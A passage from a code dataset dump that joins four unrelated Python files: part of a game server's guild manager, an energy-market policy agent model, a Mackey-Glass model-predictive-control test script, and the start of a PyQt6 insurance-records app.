\n def __gotGuildNameStatus(self, status):\n if status == 3:\n self.mgr.d_recvNameRequest([self.sender], 2)\n self.demand('Off')\n return\n \n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setWishName': [self.name], 'setOldName': [self.guild['setName'][0]]})\n self.mgr.d_recvNameRequest([self.sender], 3)\n self.demand('Off')\n \nclass GuildManagerUD(DistributedObjectGlobalUD):\n notify = DirectNotifyGlobal.directNotify.newCategory(\"GuildManagerUD\")\n \n def __init__(self, air):\n DistributedObjectGlobalUD.__init__(self, air)\n self.operations = {}\n self.invites = {}\n self.memberListCache = {}\n self.accept('pirateOnline', self.pirateOnline)\n self.accept('goingOffline', self.goingOffline)\n \n def addMemberList(self, guildId, memberList):\n self.memberListCache[guildId] = memberList\n \n def getMemberList(self, guildId):\n return self.memberListCache.get(guildId)\n \n def getMemberIds(self, guildId):\n memberList = self.getMemberList(guildId)\n \n if memberList:\n return [member[0] for member in memberList if member[0] in self.air.piratesFriendsManager.onlinePirates]\n \n def hasOperation(self, avId):\n return avId in self.operations\n\n def createGuild(self):\n avId = self.air.getAvatarIdFromSender()\n\n if avId not in self.operations:\n CreateGuildOperation(self, avId).demand('Start')\n \n def d_guildStatusUpdate(self, avId, guildId, guildName, guildRank):\n self.sendUpdateToAvatarId(avId, 'guildStatusUpdate', [guildId, guildName, guildRank])\n \n def d_notifyGuildKicksMaxed(self, avId):\n self.sendUpdateToAvatarId(avId, 'notifyGuildKicksMaxed', [])\n \n def d_receiveMembers(self, avId, members):\n self.sendUpdateToAvatarId(avId, 'receiveMembers', [members])\n \n def d_guildRejectInvite(self, avId, reason):\n self.sendUpdateToAvatarId(avId, 'guildRejectInvite', [reason])\n \n def d_invitationFrom(self, avId, fromId, fromName, guildId, guildName):\n self.sendUpdateToAvatarId(avId, 'invitationFrom', [fromId, fromName, guildId, guildName])\n \n def d_recvNameRequest(self, avIds, code):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvNameRequest', [code])\n \n def d_recvChat(self, avIds, senderId, senderName, message):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvChat', [senderId, senderName, message])\n \n def d_recvSC(self, avIds, senderId, senderName, msgIndex):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvSC', [senderId, senderName, msgIndex])\n \n def d_recvSCQuest(self, avIds, senderId, senderName, questInt, msgType, taskNum):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvSCQuest', [senderId, senderName, questInt, msgType, taskNum])\n \n def d_recvAvatarOnline(self, avIds, senderId, senderName):\n for avId in avIds:\n if avId != senderId:\n self.sendUpdateToAvatarId(avId, 'recvAvatarOnline', [senderId, senderName])\n \n def d_recvAvatarOffline(self, avIds, senderId, senderName):\n for avId in avIds:\n if avId != senderId:\n self.sendUpdateToAvatarId(avId, 'recvAvatarOffline', [senderId, senderName])\n \n def d_recvMemberRemoved(self, avIds, avatarId, senderId, avatarName, senderName):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvMemberRemoved', [avatarId, senderId, avatarName, senderName])\n \n def d_recvMemberAdded(self, avIds, memberInfo, inviterId, inviterName):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvMemberAdded', [memberInfo, inviterId, inviterName])\n \n def d_recvMemberUpdateRank(self, avIds, avatarId, senderId, avatarName, senderName, rank, promote):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvMemberUpdateRank', [avatarId, senderId, avatarName, senderName, rank, promote])\n\n def d_guildNameChange(self, avIds, guildName, code):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'guildNameChange', [guildName, code])\n \n def pirateOnline(self, doId):\n PirateOnlineOperation(self, doId).demand('Start')\n \n def goingOffline(self, doId):\n self.popInvite(doId)\n PirateOfflineOperation(self, doId).demand('Start')\n \n def removeMember(self, targetId):\n avId = self.air.getAvatarIdFromSender()\n \n if targetId and avId not in self.operations:\n RemoveMemberOperation(self, avId, targetId).demand('Start')\n \n def changeRank(self, targetId, targetRank):\n if targetRank not in (GUILDRANK_GM, GUILDRANK_MEMBER, GUILDRANK_OFFICER, GUILDRANK_VETERAN):\n return\n \n avId = self.air.getAvatarIdFromSender()\n \n if targetId == avId:\n return\n \n if targetId and avId not in self.operations:\n ChangeRankOperation(self, avId, targetId, targetRank).demand('Start')\n \n def popInvite(self, avId):\n return self.invites.pop(avId, None)\n \n def requestMembers(self):\n avId = self.air.getAvatarIdFromSender()\n\n if avId not in self.operations:\n MemberListOperation(self, avId).demand('Start')\n \n def isInInvite(self, avId):\n return avId in self.invites.keys() or avId in self.invites.values()\n \n def requestInvite(self, targetId):\n avId = self.air.getAvatarIdFromSender()\n \n if targetId == avId or self.isInInvite(targetId):\n self.d_guildRejectInvite(avId, RejectCode.BUSY)\n return\n \n if targetId not in self.air.piratesFriendsManager.onlinePirates:\n self.d_guildRejectInvite(avId, RejectCode.INVITEE_NOT_ONLINE)\n return\n \n if avId not in self.operations:\n RequestInviteOperation(self, avId, targetId).demand('Start')\n \n def acceptInvite(self):\n avId = self.air.getAvatarIdFromSender()\n senderId = self.popInvite(avId)\n \n if not senderId:\n return\n \n if avId not in self.operations:\n AddMemberOperation(self, senderId, avId).demand('Start')\n \n def declineInvite(self):\n avId = self.air.getAvatarIdFromSender()\n senderId = self.popInvite(avId)\n \n if senderId:\n self.d_guildRejectInvite(senderId, RejectCode.NO_GUILD)\n\n def sendNameRequest(self, name):\n if not name:\n return\n\n avId = self.air.getAvatarIdFromSender()\n \n if avId not in self.operations:\n SendNameOperation(self, avId, name).demand('Start')\n\n def addInvitation(self, sender, target, pirateName, guildId, guildName):\n self.invites[target] = sender\n self.d_invitationFrom(target, sender, pirateName, guildId, guildName)\n \n def __addChatOperation(self, callback, extraArgs):\n sender = self.air.getAvatarIdFromSender()\n \n if sender not in self.operations:\n extraArgs.insert(0, sender)\n SendChatOperation(self, sender, callback, extraArgs).demand('Start')\n \n def sendChat(self, message):\n self.__addChatOperation(self.d_recvChat, [message])\n \n def sendSC(self, msgIndex):\n self.__addChatOperation(self.d_recvSC, [msgIndex])\n \n def sendSCQuest(self, questInt, msgType, taskNum):\n self.__addChatOperation(self.d_recvSCQuest, [questInt, msgType, taskNum])","repo_name":"DarthMDev/PORSRC","sub_path":"otp/friends/GuildManagerUD.py","file_name":"GuildManagerUD.py","file_ext":"py","file_size_in_byte":24750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16110924083","text":"import random\nfrom random import randint\n\nfrom collections import namedtuple\nimport numpy as np\nimport pandas as pd\nimport math\nimport Utils\nimport os\n\n\nclass policyMaker():\n \n def __init__(self, params, BASEYEAR):\n self.params = params\n self.BASEYEAR = BASEYEAR\n self.year= self.BASEYEAR\n self.path_save = params[\"path_save\"]\n\n self.buildRatePerType = pd.DataFrame() #dataframe of the build rate per technology type per year\n\n carbonFilePath = 'CarbonPrice/carbonPrice'+str(self.BASEYEAR)+'_2050.txt'\n self.yearlyCarbonCost = Utils.loadTextFile(carbonFilePath)\n wholesaleElecFilePath = 'WholesaleEnergyPrices/ElectricityBaseLoad'+str(self.BASEYEAR)+'_2050_GBPPerkWh.txt'\n self.yearlyWholesalePrice = Utils.loadTextFile(wholesaleElecFilePath)\n self.curCO2Price = self.yearlyCarbonCost[0] #£/tCO2\n self.yearCO2IntensityTarget = 0 #gCO2/kWh \n\n self.name = 'Government'\n self.updateCO2Target()\n\n self.elecGenCompanies = list()\n\n def updateCO2Target(self):\n # gCO2/kWh, 50-100 in https://www.current-news.co.uk/news/uk-powers-to-new-grid-carbon-intensity-low-of-just-32g-co2-kwh\n if self.year<2018:\n self.carbonIntensityTarget = 250\n elif self.year<=2035:\n CO2DecreaseFrac = (self.year - 2018)/(2035 - 2018)\n newCO2P = 250 * (1-CO2DecreaseFrac)\n self.carbonIntensityTarget = newCO2P\n else:\n self.carbonIntensityTarget = 0\n\n # update values for next year\n def increment_year(self):\n self.year = self.year + 1\n self.updateCO2Target()\n\n def getNextYearCO2Price(self, carbonIntensity):\n print('emissionsIntense from last year (gCO2/kWh)',carbonIntensity)\n print('yearCO2IntensityTarget (gCO2/kWh)',self.carbonIntensityTarget)\n BEISco2Price = self.yearlyCarbonCost[self.year-self.BASEYEAR]\n if carbonIntensity > self.carbonIntensityTarget:\n CO210PC = self.curCO2Price *1.1\n if CO210PC > BEISco2Price:\n self.curCO2Price = CO210PC\n else:\n self.curCO2Price = BEISco2Price\n else:\n curCO2 = self.curCO2Price\n if curCO2 > BEISco2Price:\n self.curCO2Price = curCO2\n else:\n self.curCO2Price = BEISco2Price\n \n return self.curCO2Price\n\n # estimate demand in a specific year\n def projectedPeakDemand(self, targetYear):\n \n FESYearlyPeak = Utils.loadTextFile('Generation/NationalGrid_FES_TwoDeg_PeakDemandChange.txt')\n y = targetYear-2010\n newPeakD = FESYearlyPeak[y]*1000000.0 #in kW\n return newPeakD\n \n # estimate capacity in a specific year\n def projectedCapacity(self, targetYear):\n totCap = 0.0\n for eGC in self.elecGenCompanies:\n totCap = totCap + eGC.getCapYear(targetYear,True) # true for derated capacity\n return totCap\n\n # Method to cap the build rate of technologies\n # if capacity excess the build rate, bids are randomly removed\n def capBuildRate(self, bids, bidColumn, ascending=True):\n frames = []\n for genName in bids.index.unique():\n\n temp_df = bids.loc[genName, :].copy()\n if not isinstance(temp_df, pd.DataFrame): #there is only one line so it is a Serie\n temp_df = temp_df.to_frame().T\n else:\n temp_df = temp_df.sample(frac=1) # shuffle the dataset\n temp_df.sort_values(bidColumn, ascending=ascending, inplace=True) \n yearOfInstallation = temp_df[\"start_year\"].mean()\n maxBuildingRate = int(self.buildRatePerType.loc[genName,yearOfInstallation])\n print(\"The build rate of {0} is {1} kW in {2}\".format(genName, maxBuildingRate, yearOfInstallation))\n if maxBuildingRate>0:\n temp_df[\"cumulative_capacity_kW\"] = temp_df[\"capacity_kW\"].cumsum()\n temp_df = temp_df.loc[temp_df[\"cumulative_capacity_kW\"]<=maxBuildingRate, :]\n capToBeInstalled = temp_df[\"capacity_kW\"].sum()\n self.buildRatePerType.loc[genName,yearOfInstallation] = maxBuildingRate - capToBeInstalled\n frames.append(temp_df)\n if len(frames) > 0:\n newBids = pd.concat(frames)\n else:\n newBids = pd.DataFrame()\n return newBids\n\n # hold capacity auction\n def capacityAuction(self, timeHorizon, sorted_TNUoS_charges):\n print('---------------------- Capacity Auction Method ---------------------')\n demandYear = self.year+timeHorizon\n cap_subsidy = 0 #£/kW include cap of 75£/kW as per BRAIN paper for the bids\n scaleACS = 1.09 # The value of ACS accounts for a potential 9% increase in peak demand that could be experienced during a cold winter\n # Book: Ter-Gazarian, A.G., Energy Storage for Power Systems, Page 18\n estPeakD = (self.projectedPeakDemand(demandYear)* scaleACS)\n estDeRCap = self.projectedCapacity(demandYear)\n print(demandYear)\n print('Estimated Peak Demand ', estPeakD)\n print('Estimated Derated Capacity ', estDeRCap)\n \n if estPeakD > estDeRCap:\n print('---------------------- Holding Capacity Auction ---------------------')\n capShortFall = estPeakD - estDeRCap\n\n framesBids =[]\n for eGC in self.elecGenCompanies:\n temp_dfBids = eGC.getCapAuctionBid(timeHorizon, sorted_TNUoS_charges)\n framesBids.append(temp_dfBids)\n allBids = pd.concat(framesBids)\n allBids.to_csv(self.path_save+\"All_CapacityMarket_bids_\"+str(self.year)+\".csv\")\n #removed based that do not comply with the building rate of plants\n allBids = self.capBuildRate(allBids, \"bid_price_GBP/kW\")\n if len(allBids) > 0:\n allBids.sort_values([\"bid_price_GBP/kW\"], ascending=True, inplace=True)\n allBids[\"cumulative_derated_capacity_kW\"] = allBids[\"derated_capacity_kW\"].cumsum()\n \n # Allocate cap subsidies until demand is met\n if cap_subsidy > 0:\n allBids.loc[allBids[\"bid_price_GBP/kW\"] > cap_subsidy, \"bid_price_GBP/kW\"] = cap_subsidy\n unsuccessfulBids = allBids.loc[allBids[\"cumulative_derated_capacity_kW\"] > capShortFall, :].index\n successfulBids = allBids.loc[~allBids.index.isin(unsuccessfulBids), :]\n\n if len(successfulBids) > 0: #there are successful bids\n successfulBids.to_csv(self.path_save+\"Successful_CapacityMarket_Bids\"+str(self.year)+\".csv\")\n for genName, row in successfulBids.iterrows(): # Add eligible plants to the construction queue\n eGCName = row[\"generation_company\"]\n capacitykW = row[\"capacity_kW\"]\n start_year = row[\"start_year\"]\n end_year = row[\"end_year\"]\n capacity_market_sub = row[\"bid_price_GBP/kW\"]\n CfD_price = 0\n busbar = row[\"busbar\"]\n eGC = Utils.getGenerationCompany(eGCName, self.elecGenCompanies)\n eGC.addToConstructionQueue(genName, capacitykW, start_year, end_year, capacity_market_sub, CfD_price, busbar)\n else:\n print(' ----------------- No capacity auction ----------------------')\n return estPeakD, estDeRCap\n\n\n # method to hold CfD auction\n def cfdAuction(self, capYears, commisCap, timeHorizon, sorted_TNUoS_charges, avgElectricityPrice):\n # check if commissioning year\n y = self.year - self.BASEYEAR\n allBids = pd.DataFrame()\n if y%capYears == 0: #capYears =3\n print('++++++++++++++++++ Holding CfD auction +++++++++++++++++++++++')\n print(\"year\", y)\n frames = []\n for eGC in self.elecGenCompanies:\n # print(eGC.name)\n temp_bids_df = eGC.getCFDAuctionBid(timeHorizon, sorted_TNUoS_charges)\n frames.append(temp_bids_df) \n if len(frames)>0:\n # Merge the bids together and select the accepted bids\n allBids = pd.concat(frames)\n allBids = allBids.loc[allBids[\"capacity_kW\"]>0].copy()\n allBids = self.capBuildRate(allBids, 'strike_price_GBP/kWh')\n\n allBids.sort_values(by=['strike_price_GBP/kWh'], inplace=True)\n allBids.to_csv(self.path_save+\"All_CfD_bids_\"+str(self.year)+\".csv\")\n print(\"Average electricity price {0}\".format(avgElectricityPrice))\n allBids = allBids.loc[allBids['strike_price_GBP/kWh']>avgElectricityPrice, :]\n allBids[\"cumulative_capacity_kW\"] = allBids[\"capacity_kW\"].cumsum()\n successfulBids = allBids.loc[allBids[\"cumulative_capacity_kW\"]<=commisCap, :] #accepted bids\n\n if len(successfulBids) > 0:\n successfulBids.to_csv(self.path_save+\"Successful_CfD_bids_\"+str(self.year)+\".csv\")\n\n for genName, row in successfulBids.iterrows(): # Add eligible plant to the construction queue\n eGCName = row[\"generation_company\"]\n capacitykW = row[\"capacity_kW\"]\n start_year = row[\"start_year\"]\n end_year = row[\"end_year\"]\n CfD_price = -(avgElectricityPrice-row['strike_price_GBP/kWh'])\n capacity_market_sub = 0\n busbar = row[\"busbar\"]\n eGC = Utils.getGenerationCompany(eGCName, self.elecGenCompanies)\n eGC.addToConstructionQueue(genName, capacitykW, start_year, end_year, capacity_market_sub, CfD_price, busbar)\n else:\n print('++++++++++++++++++ No CfD auction +++++++++++++++++++++++')\n\n return True\n\n\n\n\n \n\n\n\nif __name__ == '__main__': # to test some of the functions of the policy Maker\n path_technology_dataset = r'D:\\OneDrive - Cardiff University\\04 - Projects\\18 - ABM\\01 - Code\\ABM code - Dec 2021\\Code_WH'\n # list of generation technologies\n technoloy_dataset_fn = \"technology_technical_economic_parameters.xlsx\"\n temp_df = pd.read_excel(path_technology_dataset+os.path.sep+technoloy_dataset_fn, sheet_name = \"technical_parameters\", index_col=0)\n technology_technical_df = temp_df.loc[temp_df[\"Set\"]==\"Current\", :].copy()\n\n temp_df = pd.read_excel(path_technology_dataset+os.path.sep+technoloy_dataset_fn, sheet_name = \"economic_parameters\")\n technology_economic_df = temp_df.loc[temp_df[\"Set\"]==\"Current\", :].copy()\n technology_economic_df.fillna(0, inplace=True)\n\n busbarConstraints = pd.read_excel(path_technology_dataset+os.path.sep+technoloy_dataset_fn, sheet_name = \"Bus constraints\", index_col=0)\n busbarConstraints.fillna(0, inplace=True)\n\n params = {}\n params[\"technical_parameters\"] = technology_technical_df\n params[\"economic_parameters\"] = technology_economic_df\n params[\"busbar_constraints\"] = busbarConstraints\n genTechList = list(technology_technical_df.index)\n\n buildRatePerType = pd.DataFrame(index= genTechList+['Battery'],columns=[2010+y for y in range(70)])\n buildRatePerType.fillna(2000000, inplace=True)\n\n # path to where you want results output to\n \n params[\"path_save\"] = 'Results/2050/'\n params[\"path_wholesale_fuel_price\"] = r'D:\\OneDrive - Cardiff University\\04 - Projects\\18 - ABM\\01 - Code\\ABM code - Jan 2022 saved\\Code_WH\\WholesaleEnergyPrices'\n\n bids_test = pd.DataFrame(Utils.getBids1())\n bids_test.set_index('Unnamed: 0', inplace=True, drop=True)\n\n other_bids = pd.DataFrame(Utils.getBids2())\n other_bids.set_index('Unnamed: 0', inplace=True, drop=True) \n\n buildRatedf = pd.DataFrame(Utils.getBuildRate())\n buildRatedf.set_index('Unnamed: 0', inplace=True, drop=True) \n\n policy = policyMaker(params, 2010)\n policy.buildRatePerType = buildRatePerType\n policy.year = 2036\n\n new_bids = policy.capBuildRate(bids_test, 'Bid_Price_GBP/kW')\n print(policy.buildRatePerType.loc[:, 2036:2045])\n print(len(new_bids))\n\n new_bids = policy.capBuildRate(other_bids, 'ROI', False)\n print(policy.buildRatePerType.loc[:, 2036:2045])\n print(len(new_bids))\n print(new_bids)\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n \n \n","repo_name":"AlexandreLab/ABM","sub_path":"policyMaker.py","file_name":"policyMaker.py","file_ext":"py","file_size_in_byte":12468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23578603572","text":"# -------------------------------------------------------------------------------------------------------------------- #\n# Add path and create output folder\n\nfrom os import sep, makedirs, path\nfrom sys import path as syspath\n\n# Add path\nfileName = path.abspath(__file__)\npathMain = fileName[:fileName.lower().find(sep + 'quasimodo') + 10]\nsyspath.append(pathMain)\n\n# Create output folder\npathOut = path.join(pathMain, 'tests', 'results', fileName[fileName.rfind(sep) + 1:-3])\nmakedirs(pathOut, exist_ok=True)\n# -------------------------------------------------------------------------------------------------------------------- #\n\nfrom QuaSiModO import *\nfrom visualization import *\nimport numpy as np\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Set parameters\n# -------------------------------------------------------------------------------------------------------------------- #\nT = 20.0 # Time for the MPC problem\nh = 0.05 # Time step for the ODE solver, for the training data sampling and for the MPC step length\n\nuMin = [-0.2] # Minimal value of the input (also defines dimU)\nuMax = [1.0]\n\nnGridU = 2 # number of parts the grid is split into (--> uGrid = [-2, 0, 2])\nuGrid = np.array([uMin, [0.0], uMax])\n\nTtrain = 20.0 # Time for the simulation in the traing data generation\nnLag = 5 # Lag time for EDMD\n\ntau = 2.0\ndimZ = 1\n\ny0 = list()\nnSpline = 4\ntSpline = np.linspace(-tau, 0.0, nSpline)\ntTau = np.linspace(-tau, 0.0, int(tau / h) + 1)\ntck = interpolate.splrep(tSpline, 0.5 + 2.0 * np.random.rand(nSpline), s=0)\ny0.append(interpolate.splev(tTau, tck, der=0))\nparams = {'tau': tau}\n\napprox_res_size = 200\nradius = 0.75\nsparsity = 0.9\n\npathData = path.join(pathOut, 'data_ESN_1_0')\nsavePath_mat = path.join(pathOut, 'result_ESN_1_0')\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Model creation\n# -------------------------------------------------------------------------------------------------------------------- #\n\n# Create model class\nmodel = ClassModel('mackey-glass.py', h=h, uMin=uMin, uMax=uMax, dimZ=dimZ, params=params, typeUGrid='cube',\n nGridU=nGridU, uGrid=uGrid)\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Data collection\n# -------------------------------------------------------------------------------------------------------------------- #\n\n# Create data set class\ndataSet = ClassControlDataSet(h=model.h, T=Ttrain)\n\nuTrain, iuTrain = dataSet.createControlSequence(model, T=1000.0, typeSequence='piecewiseConstant', nhMin=5,\n nhMax=5) # , u=uTrain,iu=iuTrain)#,u=uTrain,iu=iuTrain)\n\n# Create a data set (and save it to an npz file)\nif path.exists(pathData + '.npz'):\n dataSet.createData(loadPath=pathData)\nelse:\n dataSet.createData(model=model, y0=y0, u=uTrain, savePath=pathData)\n\ny0 = dataSet.rawData.y[-1][-nLag, :]\nz0 = dataSet.rawData.z[-1][-nLag, :]\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Surrogate modeling\n# -------------------------------------------------------------------------------------------------------------------- #\n\nsurrogate = ClassSurrogateModel('ESN.py', uGrid=model.uGrid, h=nLag * model.h, dimZ=model.dimZ,\n z0=z0, nDelay=0, nLag=nLag,\n approx_res_size=approx_res_size, spectral_radius=radius, sparsity=sparsity)\n\n# For the ESN we need the rawData (not prepared)\n# ToDo: Passendes prepareDate schreiben\nsurrogate.createROM(dataSet.rawData)\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# MPC\n# -------------------------------------------------------------------------------------------------------------------- #\n\n# Define reference trajectory for second state variable (iRef = 1)\nTRef = T + 5.0\nnRef = int(round(TRef / h)) + 1\n\nzRef = np.zeros([nRef, 1], dtype=float)\nzRef[:, 0] = 1.0\n\ntRef = np.array(np.linspace(0.0, T, nRef))\n\nreference = ClassReferenceTrajectory(model, T=TRef, zRef=zRef)\n\nscipyMinimizeOptions = {'epsilon': 1e-10}\n\n# Create class for the MPC problem\nMPC = ClassMPC(np=5, nc=1, typeOpt='continuous', scipyMinimizeMethod='SLSQP',\n scipyMinimizeOptions=scipyMinimizeOptions) # scipyMinimizeMethod=\n\n# Weights for the objective function\nQ = [1.0] # reference tracking: (z - deltaZ)^T * Q * (z - deltaZ)\nR = [0.0] # control cost: u^T * R * u\nS = [0.0] # weighting of (u_k - u_{k-1})^T * S * (u_k - u_{k-1})\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Solve different MPC problems (via \"MPC.run\") and plot the result\n# -------------------------------------------------------------------------------------------------------------------- #\n\nsave_path_cont = path.join(pathOut, 'MackeyGlass_ESN_cont_1_0')\nsave_path_SUR = path.join(pathOut, 'MackeyGlass_ESN_SUR_1_0')\n\n# 1) Surrogate model, continuous input obtained via relaxation of the integer input in uGrid\nresultCont = MPC.run(model, reference, surrogateModel=surrogate, y0=y0, z0=z0, T=T, Q=Q, R=R, S=S,\n savePath=save_path_cont)\nresultCont.saveMat('MackeyGlass_ESN_cont_1_0', pathOut)\n\nplot(z={'t': resultCont.t, 'z': resultCont.z, 'reference': reference, 'iplot': 0},\n u={'t': resultCont.t, 'u': resultCont.u, 'iplot': 1},\n J={'t': resultCont.t, 'J': resultCont.J, 'iplot': 2},\n nFev={'t': resultCont.t, 'nFev': resultCont.nFev, 'iplot': 3})\n\n# Not relevant since the control enters lineary\n# 2) Surrogate model, integer control computed via relaxation and sum up rounding\n# MPC.typeOpt = 'SUR'\n# result_SUR = MPC.run(model, reference, surrogateModel=surrogate, y0=y0, z0=z0, T=T, Q=Q, R=R, S=S, savePath=save_path_SUR)\n# result_SUR.saveMat('MackeyGlass_ESN_SUR_1_0', pathOut)\n#\n# plot(z={'t': result_SUR.t, 'z': result_SUR.z, 'reference': reference, 'iplot': 0},\n# u={'t': result_SUR.t, 'u': result_SUR.u, 'iplot': 1},\n# J={'t': result_SUR.t, 'J': result_SUR.J, 'iplot': 2},\n# nFev={'t': result_SUR.t, 'nFev': result_SUR.nFev, 'iplot': 3},\n# alpha={'t': result_SUR.t, 'alpha': result_SUR.alpha, 'iplot': 4},\n# omega={'t': result_SUR.t, 'omega': result_SUR.omega, 'iplot': 5})\n","repo_name":"SebastianPeitz/QuaSiModO","sub_path":"tests/MackeyGlass_ESN.py","file_name":"MackeyGlass_ESN.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"74747098605","text":"import sys\nfrom PyQt6.QtWidgets import QApplication, QLabel, QWidget, QGridLayout, \\\n QLineEdit, QPushButton, QMainWindow, QTableWidget, QTableWidgetItem, \\\n QDialog, \\\n QVBoxLayout, QComboBox, QToolBar, QStatusBar, QMessageBox\nfrom PyQt6.QtGui import QAction, QIcon\nfrom PyQt6.QtCore import Qt\n\nfrom DatabaseConnection import DatabaseConnection\nfrom AboutDialog import AboutDialog\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n\n super().__init__()\n self.setWindowTitle(\"Insurance Management System\")\n self.setMinimumSize(800, 600)\n\n file_menu_item = self.menuBar().addMenu(\"&File\")\n help_menu_item = self.menuBar().addMenu(\"&Help\")\n edit_menu_item = self.menuBar().addMenu(\"&Edit\")\n\n add_insurance_action = QAction(QIcon(\"icons/add.png\"),\n \"Add Record\", self)\n add_insurance_action.triggered.connect(self.insert)\n file_menu_item.addAction(add_insurance_action)\n\n search_action = QAction(QIcon(\"icons/search.png\"),\n \"Search\", self)\n search_action.triggered.connect(self.search)\n edit_menu_item.addAction(search_action)\n\n about_action = QAction(\"About\", self)\n help_menu_item.addAction(about_action)\n about_action.triggered.connect(self.about)\n\n self.table = QTableWidget()\n self.table.setColumnCount(5)\n self.table.setHorizontalHeaderLabels((\"Id\", \"Name\", \"Insurance\",\n \"Mobile\", \"Age\"))\n self.table.verticalHeader().setVisible(False)\n self.setCentralWidget(self.table)\n\n # Create toolbar and add toolbar elements\n toolbar = QToolBar()\n toolbar.setMovable(True)\n self.addToolBar(toolbar)\n toolbar.addAction(add_insurance_action)\n toolbar.addAction(search_action)\n\n # Create a status bar and add status bar elements\n self.statusbar = QStatusBar()\n self.setStatusBar(self.statusbar)\n\n # Detect a cell click\n self.table.cellClicked.connect(self.cell_clicked)\n\n def cell_clicked(self):\n \"\"\"\n This function creates the status bar actions\n :return:\n \"\"\"\n edit_button = QPushButton(\"Edit Record\")\n edit_button.clicked.connect(self.edit)\n\n delete_button = QPushButton(\"Delete Record\")\n delete_button.clicked.connect(self.delete)\n\n children = self.findChildren(QPushButton)\n if children:\n for child in children:\n self.statusbar.removeWidget(child)\n\n self.statusbar.addWidget(edit_button)\n self.statusbar.addWidget(delete_button)\n\n def load_data(self):\n \"\"\"\n This function loads the data in the database\n :return:\n \"\"\"\n connection = DatabaseConnection().connect()\n result = connection.execute(\"SELECT * FROM insurance\")\n self.table.setRowCount(0)\n for row_number, row_data in enumerate(result):\n self.table.insertRow(row_number)\n for column_number, data in enumerate(row_data):\n self.table.setItem(row_number, column_number,\n QTableWidgetItem(str(data)))\n connection.close()\n\n def insert(self):\n dialog = InsertDialog()\n dialog.exec()\n\n def search(self):\n dialog = SearchDialog()\n dialog.exec()\n\n def edit(self):\n dialog = EditDialog()\n dialog.exec()\n\n def delete(self):\n dialog = DeleteDialog()\n dialog.exec()\n\n def about(self):\n dialog = AboutDialog()\n dialog.exec()\n\n\nclass InsertDialog(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Insert Insurance Data\")\n self.setFixedWidth(300)\n self.setFixedHeight(300)\n\n layout = QVBoxLayout()\n\n # Add insurance name\n self.insurance_name = QLineEdit()\n self.insurance_name.setPlaceholderText(\"Name\")\n layout.addWidget(self.insurance_name)\n\n # Add combo box\n self.insurance_type = QComboBox()\n types = [\"Life Insurance\", \"Car Insurance\", \"House Insurance\"]\n self.insurance_type.addItems(types)\n layout.addWidget(self.insurance_type)\n\n # Add mobile widget\n self.mobile = QLineEdit()\n self.mobile.setPlaceholderText(\"Mobile\")\n layout.addWidget(self.mobile)\n\n # Add age widget\n self.age = QLineEdit()\n self.age.setPlaceholderText(\"Age\")\n layout.addWidget(self.age)\n\n # Add submit button\n button = QPushButton(\"Register\")\n button.clicked.connect(self.add_insurance)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n def add_insurance(self):\n \"\"\"\n This function adds a new record to the database\n :return:\n \"\"\"\n name = self.insurance_name.text()\n insurance = self.insurance_type.itemText(self.insurance_type.\n currentIndex())\n mobile = self.mobile.text()\n age = self.age.text()\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n cursor.execute(\"INSERT INTO insurance (name, insurance, mobile, age) \"\n \"VALUES (?, ?, ?, ?)\",\n (name, insurance, mobile, age))\n connection.commit()\n cursor.close()\n connection.close()\n main_window.load_data()\n\nclass SearchDialog(QDialog):\n def __init__(self):\n super().__init__()\n # Set window title and size\n self.setWindowTitle(\"Search Insurance Data\")\n self.setFixedWidth(300)\n self.setFixedHeight(300)\n\n # Create layout and input widget\n layout = QVBoxLayout()\n self.insurance_name = QLineEdit()\n self.insurance_name.setPlaceholderText(\"Name\")\n layout.addWidget(self.insurance_name)\n\n # Create button\n button = QPushButton(\"Search\")\n button.clicked.connect(self.search)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n def search(self):\n \"\"\"\n Function to search name in the database\n :return:\n \"\"\"\n # Connection the database\n name = self.insurance_name.text()\n connection = DatabaseConnection().connect()\n cursor = connection.cursor()\n result = cursor.execute(\"SELECT * FROM insurance WHERE name = ?\",\n (name,))\n rows = list(result)\n print(rows)\n items = main_window.table.findItems(name, Qt.MatchFlag.\n MatchFixedString)\n for item in items:\n print(item)\n main_window.table.item(item.row(), 1).setSelected(True)\n\n cursor.close()\n connection.close()\n\n\nclass EditDialog(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Update Insurance Data\")\n self.setFixedWidth(300)\n self.setFixedHeight(300)\n\n layout = QVBoxLayout()\n # Get insurance name from selected row\n index = main_window.table.currentRow()\n insurance_name = main_window.table.item(index, 1).text()\n\n # Get id from selected row\n self.insurance_id = main_window.table.item(index, 0).text()\n # Get the current insurance name\n self.insurance_name = QLineEdit(insurance_name)\n self.insurance_name.setPlaceholderText(\"Name\")\n layout.addWidget(self.insurance_name)\n\n # Get the current insurance type\n insurance_type = main_window.table.item(index, 2).text()\n self.insurance_type = QComboBox()\n types = [\"Life Insurance\", \"Car Insurance\", \"House Insurance\"]\n self.insurance_type.addItems(types)\n 